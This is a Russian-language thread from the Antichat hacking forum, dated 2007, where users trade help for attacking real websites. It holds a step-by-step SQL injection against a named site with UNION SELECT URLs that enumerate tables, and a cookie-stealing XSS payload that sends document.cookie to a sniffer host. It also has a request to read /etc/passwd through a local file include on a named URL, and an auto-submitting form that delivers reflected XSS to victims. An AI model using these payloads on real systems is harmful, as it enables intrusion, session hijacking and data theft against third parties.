Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
16.08.2007, 20:28
|
|
Участник форума
Регистрация: 06.09.2006
Сообщений: 177
Провел на форуме:
284125
Репутация:
16
|
|
я дурак )) не стер в сайт в ошибке ))) вот ламер то ))....
P.s. сокс 5 стоит... врятли бы свычислили ))...
я понимаю что все-таки есть риск , но просто выдалась ошщибка , я то ясное дело не буду дальше углублятся потому что не дурак понимаю что могут вычислить...
ну если рассматривать все-таки данную ошгибку что мона из нее полезное извлечь предположим эот не сайт федеральной налогой слуджбы а другой.... что мона применить?? просто для интереса ...
|
|
|
17.08.2007, 01:20
|
|
Новичок
Регистрация: 11.08.2007
Сообщений: 25
Провел на форуме:
131466
Репутация:
11
|
|
У меня такой вопрос.
Как заставить вот это работать
Код:
![](http://site.ru/sniffer/lol.jpg"+javascript<b></b>:document.cookie;)
Когда я посылаю сообщение на сайте,то фотку не видно,REFERER работает а вот document.cookie нет поскольку не правельно изложено. Пытался по разному,и так тоже
Код:
![](http://site.ru/sniffer/lol.jpg"+javascript<b></b>:alert(document.cookie);)
но без изменений,кукис не достаёт падла.
html отключён там,прочерк тоже не канает там.
что посоветуете ?
Последний раз редактировалось Nazaret2005; 17.08.2007 в 01:23..
|
|
|
|
17.08.2007, 01:39
|
|
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868
Репутация:
849
|
|
Taylorith, там не sql, там просто файлом secure.log тебе запрещено изменять. и все
SQL inj появляется тогда, когда написано что sql error... и то не всегда
Nazaret2005
<script>img = new Image(); img.src = "http://site.ru/sniffer/lol.jpg?"+document.cookie;</script>
?
Последний раз редактировалось Basurman; 17.08.2007 в 01:42..
|
|
|
|
17.08.2007, 01:43
|
|
Новичок
Регистрация: 11.08.2007
Сообщений: 25
Провел на форуме:
131466
Репутация:
11
|
|
Basurman - Я же написал,что html и прочерки не возможны... По этому не получается...
P.S
вот так у него построино.
PHP код:
function comment($text, $strip_html = true) {
$s = $text;
$s = str_replace(";)", ":wink:", $s);
if ($strip_html)
$s = htmlspecialchars_uni($s);
$bb[] = "#\[img\]([^?](?:[^\[]+|\[(?!url))*?)\[/img\]#i";
$html[] = "<img class=\"linked-image\" src=\"\\1\" border=\"0\" alt=\"\\1\" title=\"\\1\" />";
$bb[] = "#\[img=([a-zA-Z]+)\]([^?](?:[^\[]+|\[(?!url))*?)\[/img\]#is";
$html[] = "<img class=\"linked-image\" src=\"\\2\" align=\"\\1\" border=\"0\" alt=\"\\2\" title=\"\\2\" />";
$bb[] = "#\[img\ alt=([a-zA-Zа-яА-Я0-9\_\-\. ]+)\]([^?](?:[^\[]+|\[(?!url))*?)\[/img\]#is";
$html[] = "<img class=\"linked-image\" src=\"\\2\" align=\"\\1\" border=\"0\" alt=\"\\1\" title=\"\\1\" />";
$bb[] = "#\[img=([a-zA-Z]+) alt=([a-zA-Zа-яА-Я0-9\_\-\. ]+)\]([^?](?:[^\[]+|\[(?!url))*?)\[/img\]#is";
$html[] = "<img class=\"linked-image\" src=\"\\3\" align=\"\\1\" border=\"0\" alt=\"\\2\" title=\"\\2\" />";
$s = preg_replace($bb, $html, $s);
return $s;
}
ну а это выводит результат
PHP код:
" . comment($member["info"]) . "
Последний раз редактировалось Nazaret2005; 17.08.2007 в 02:04..
|
|
|
|
17.08.2007, 11:54
|
|
Участник форума
Регистрация: 06.09.2006
Сообщений: 177
Провел на форуме:
284125
Репутация:
16
|
|
Сообщение от Basurman
Taylorith, там не sql, там просто файлом secure.log тебе запрещено изменять. и все
SQL inj появляется тогда, когда написано что sql error... и то не всегда
я понял что это не скуль инъекция, ))) мне интересно может мона ьулдет заюзать как нить php инклуд или что то еще,не зря же ошибька выдается.
|
|
|
|
17.08.2007, 23:35
|
|
Познающий
Регистрация: 31.07.2006
Сообщений: 46
Провел на форуме:
596615
Репутация:
18
|
|
вот нашел я локальний инклуд http://www.polarion.org/index.php?page=
и чегото никак не получается прочитать etc/passwd
Как ето там реализировать )
|
|
|
|
19.08.2007, 16:10
|
|
Познающий
Регистрация: 01.04.2007
Сообщений: 43
Провел на форуме:
297955
Репутация:
-5
|
|
Вот SQL-inj _http://mir-tech.ru/select.php?cat=2&categ=2&l=0&cat_num=25&mess=-1
Можете мне обьяснить дураку, ато я никак не пойму как подбирать количество столбцов и их названия?
|
|
|
|
19.08.2007, 20:50
|
|
Участник форума
Регистрация: 06.09.2006
Сообщений: 177
Провел на форуме:
284125
Репутация:
16
|
|
все очень просто , во первых лучшеб былоб если ты в эжтой переменной провел бы скуль, http://mir-tech.ru/group.php?cat= так как она самая такая доступная... ) я покажу именно на ней ) впринципе там во всех переменных возможна скуль)))) ну да алдно
первым делом делаешь следующее
http://mir-tech.ru/group.php?cat=-1+order+by+10/* он выдаст ошибку значит столбцов меньше 10 ))
http://mir-tech.ru/group.php?cat=-1+order+by+5/* снова ошибка значит меньше 5 и так далее мы дойдем до того что столбцов меньше 2 )) отсюда следует что столбов 1 )) 1 столбец ))
http://mir-tech.ru/group.php?cat=-1+union+select+1/*
вот выдал тебе единичку )) далее чстобы узнать версию
http://mir-tech.ru/group.php?cat=-1+union+select+version()/*
5.0.41-log )) вот она легко ломается ))
если что непонятно первым делом сюда ) http://forum.antichat.ru/thread43966.html
)) а так можешь потсучаться в асю 896353 )
http://mir-tech.ru/group.php?cat=-5+union+select+table_name+from+information_schema. tables+limit+3,1/*
таким образом перебираешь таблицы ))
вместо 3 можешь вставить к примеру 1 тад будет превая таблица ) 2 будет вторая )) +) и т.д )
Последний раз редактировалось Taylorith; 19.08.2007 в 20:54..
|
|
|
|
21.08.2007, 01:23
|
|
Познающий
Регистрация: 31.07.2006
Сообщений: 46
Провел на форуме:
596615
Репутация:
18
|
|
Всем доброй ночи. У меня как обыно появился глупый вопрос. Вообще суть такая, нашел я пасивную хсс, в поиске на одном сайте. но, я никак не могу потделать ссилку со своим запросом, так как ссилка после поиска имеет вид http://site.com/search/ . и все, тишина... Не смогу же я заставить человека вбить в поиск мой скрипт. Кто скажет как мне замутить ссылку чтобы все исполнялось по красоте?
Спасибо.
|
|
|
|
21.08.2007, 12:24
|
|
Познающий
Регистрация: 01.02.2007
Сообщений: 41
Провел на форуме:
1718137
Репутация:
201
|
|
попробуй изменить метод отправки формы на get.
если не даст результата, тебе нужно будет заманивать человека на свою страницу, примерно такого содержания:
Код:
<form method=post action=http://example.com/ id=form1 >
<input name=search value='"><script>alert()</script>'/>
</form>
<script for=form1 event=load >form1.submit()</script>
где action для формы и name для input ввозьмешь с уязвимого сайта.
Последний раз редактировалось V1k; 21.08.2007 в 14:01..
|
|
|
|
|
|
|
TEST QR: []
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
